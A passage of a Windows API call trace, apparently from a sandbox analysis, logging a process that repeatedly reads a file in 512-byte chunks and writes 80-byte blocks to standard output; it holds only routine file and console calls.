lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.384] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.384] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType 
(hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.386] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.386] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, 
lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, 
lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.387] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.387] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.388] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.388] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.389] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.389] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 
[0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, 
lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, 
lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, 
